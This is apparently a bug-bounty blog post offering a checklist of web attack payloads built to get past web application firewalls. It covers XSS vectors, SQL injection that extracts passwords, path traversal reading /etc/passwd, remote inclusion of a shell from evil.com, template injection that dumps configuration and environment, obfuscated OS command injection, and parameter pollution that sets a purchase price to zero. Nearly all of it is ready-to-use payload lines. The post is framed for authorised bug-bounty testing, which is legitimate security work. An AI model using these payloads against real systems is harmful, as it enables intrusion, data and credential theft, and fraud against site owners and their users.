The Ultimate Payload Checklist for XSS, SQLi, LFI, and SSTI

A practical, hands-on checklist of advanced XSS, SQLi, Path Traversal, and Code Injection payloads designed to bypass WAFs and find…

Santhosh Adiga U

~5 min read · October 26, 2025 (Updated: October 26, 2025) · Free: No

A practical, hands-on checklist of advanced XSS, SQLi, Path Traversal, and Code Injection payloads designed to bypass WAFs and find critical vulnerabilities

Let me tell you about the night I found three critical vulnerabilities in under two hours on a program that others had declared 'hardened.' The secret wasn't magic—it was this payload checklist.

After getting consistently blocked by CloudFlare and custom WAF rules on program after program, I built this arsenal through pure necessity. I documented what actually worked when standard payloads failed. The null byte variations, the case-obfuscation tricks, the timing-based SQLi that slips right through.

This collection isn't just academic—it's been my secret weapon across 100+ real-world bug bounty engagements. From bypassing Akamai on a tech giant's asset to exploiting parameter pollution in a fintech application, these payloads have consistently proven their value where it matters most: the bank.

Introduction: The Mindset

This is not a list to spray and pray. The key to advanced bug hunting is:

1. Context: Understand where you are injecting (inside an HTML tag? in a JavaScript string? in a SQL query?). 2. Observe: See how the application encodes, filters, or blocks your input. 3. Adapt: Use the appropriate payload from this list to bypass the specific filter.

Tool Recommendation: Use Burp Suite's Logger++ or a similar extension to track all your requests and responses. Use Turbo Intruder or Burp Intruder for heavy payload testing.

1. Advanced XSS Payloads (WAF & Filter Bypass)

A. For Injecting into HTML Context (e.g., <div>INJECTION_HERE</div>)

· Basic WAF Bypass Vectors:



<img src=x onerror="prompt(1)">
<img src=x onerror=prompt`1`> // Backticks instead of parentheses
<svg onload=alert`1`>
<script>prompt(1)</script> // If `script` is allowed but `onerror` is blocked

· Case Manipulation & Obfuscation:

<ScRiPt>alert(1)</ScRiPt>
<img src=x oNeRrOr=alert(1)>

· HTML Entity & Encoding Bypass:

<!-- If the app encodes only the first occurrence of a tag -->
  <<script>alert(1)</script>
  <!-- Using HTML entities inside the tag -->
  <img src=x onerror="alert(1)">
  <!-- JavaScript URL in a tag that doesn't require user interaction -->
  <body onload=alert(1)>
  <iframe src="javascript:alert(1)">

B. For Injecting into Attribute Context (e.g., <input type="text" value="INJECTION_HERE">)

· Breaking out of the Attribute:


"><script>alert(1)</script>
" autofocus onfocus=alert(1) x="
' onmouseover='alert(1)

· Without Closing the Tag (if filters block >):

 " autofocus onfocus=alert(1) //

C. For Injecting into JavaScript Context (e.g., <script>var name = 'INJECTION_HERE'</script>)

· Breaking out of the String:


';alert(1);//
';prompt(1);'
</script><script>alert(1)</script>
\'; alert(1);//

· Advanced JS Context Escalation:



// If you're inside a function or event
-alert(1)-
;[1].find(alert)
eval('al'+'ert(1)')
top['al'+'ert'](1)

2. Advanced SQLi Payloads (All DBs, WAF Bypass)

A. Union-Based SQLi (Identify column count first)

· Basic Union:


' ORDER BY 10-- - // Find column count
' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -

· WAF Bypass for UNION/SELECT:


' UniOn SelEcT 1,2,3-- -
' UNI/**/ON SEL/**/ECT 1,2,3-- - // Using comments to break up keywords
' UNION (SELECT 1,2,3)-- - // Using parentheses

B. Boolean-Based Blind SQLi

· MySQL:



' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'-- -
' AND (SELECT SUBSTR(password,1,1) FROM users WHERE id=1)='a'-- -

· MSSQL:



' AND SUBSTRING((SELECT TOP 1 password FROM users),1,1)='a'-- -

· Oracle:



' AND (SELECT SUBSTR((SELECT password FROM users WHERE rownum=1),1,1) FROM DUAL)='a'-- -

C. Time-Based Blind SQLi (When no output is shown)

· MySQL:



' AND SLEEP(5)-- -
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -

· PostgreSQL:



' AND PG_SLEEP(5)-- -

· MSSQL:



'; WAITFOR DELAY '0:0:5'-- -

· Oracle:



' AND (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3) > 0-- - // Heavy query to cause delay

D. WAF Bypass Tricks for SQLi

· Null Bytes (PHP apps):



%00' UNION SELECT 1,2,3-- -

· URL Encoding:



%55%4e%49%4f%4e %53%45%4c%45%43%54 1,2,3-- - // URL-encoded "UNION SELECT"

· Double URL Encoding:



%2555%256e%2569%256f%256e ... // Double-encoded "U" (%55 -> %2555)

· Using Comments:



/*!50000UNION*/ /*!50000SELECT*/ 1,2,3-- - // MySQL version-specific execution
UN/**/ION SEL/**/ECT 1,2,3-- -

3. Advanced Path Traversal (LFI) & WAF Bypass

· Basic Traversal:



../../../../etc/passwd

· URL Encoding:



..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

· Double URL Encoding:



..%252f..%252f..%252f..%252fetc%252fpasswd

· Unicode/UTF-8 Smuggling:



..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd // Sometimes bypasses filters that decode after WAF

· Null Byte Injection (PHP < 5.3.4):



../../../../etc/passwd%00
....//....//....//....//etc/passwd

· Path Truncation (PHP):



../../../../etc/passwd.\.\.\.\.\.\.\[ADD MANY]\.\.\.\
/etc/passwd/././././././.[ADD MANY]/./././.

· Using php://filter for Code Execution (PHP LFI):



php://filter/convert.base64-encode/resource=../../../../etc/passwd
php://filter/read=string.rot13/resource=index.php

· Direct File Inclusion for RCE:



http://evil.com/shell.txt
\\evil.com\share\shell.txt (Windows SMB)

4. Advanced Code Injection (SSTI, Command Injection)

A. Server-Side Template Injection (SSTI)

· Probe for Template Engine:



{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#[7*7]

· Once Engine Identified (e.g., Jinja2, Twig - Python/PHP):



{{ ''.__class__.__mro__[1].__subclasses__() }} // Find useful classes
{{ config.items() }} // Flask config dump
{{ cycler.__init__.__globals__.os.environ }} // Access OS environment

B. OS Command Injection

· Classic Operators:


; whoami
& whoami
| whoami
` whoami `
$(whoami)

· WAF Bypass with Encoding:



%0a whoami %0a // Newline
%26%20whoami // URL-encoded "& whoami"

· Command Obfuscation:



w'h'o'a'm'i
w$@hoami
who"a"mi
/???/??t /???/??ss?? // /bin/cat /etc/passwd (Wildcards)

5. HTTP Parameter Pollution (HPP) & Response Manipulation

· Pollution for Logic Flaws: · Scenario: POST /buy?price=10 · Payload: POST /buy?price=10&price=0 · The backend might use the first or last parameter, potentially setting the price to 0. · Pollution for XSS/SQLi Bypass: · Scenario: Input is filtered in POST body but not in GET parameters. · Payload: Inject the payload in a GET parameter and pollute it to the POST body, or vice-versa. · Parameter Fragmentation / WAF Bypass: ·?user[name]=admin&user[password]=pass (Array-based) · ?param=1¶m=2 (See which one the app uses)

Final Checklist & Workflow

1. Recon & Parameter Discovery: Use tools to find every possible input (URL params, POST data, Headers, Cookies). 2. Fuzz with Basics: Send a simple payload for each vulnerability type to see initial behavior. 3. Analyze Defenses: Did you get blocked? Was your input altered? Encoded? Filtered? 4. Deploy Advanced Payloads: Based on your analysis, use the relevant WAF-bypass payloads from this list. 5. Automate Intelligently: Use Burp Intruder with a custom payload list derived from this checklist for the specific vulnerability you're hunting.

This list is a living arsenal. Keep it updated with new bypass techniques you discover. Happy Hunting

#bug-bounty #cybersecurity #ethical-hacking #penetration-testing #payload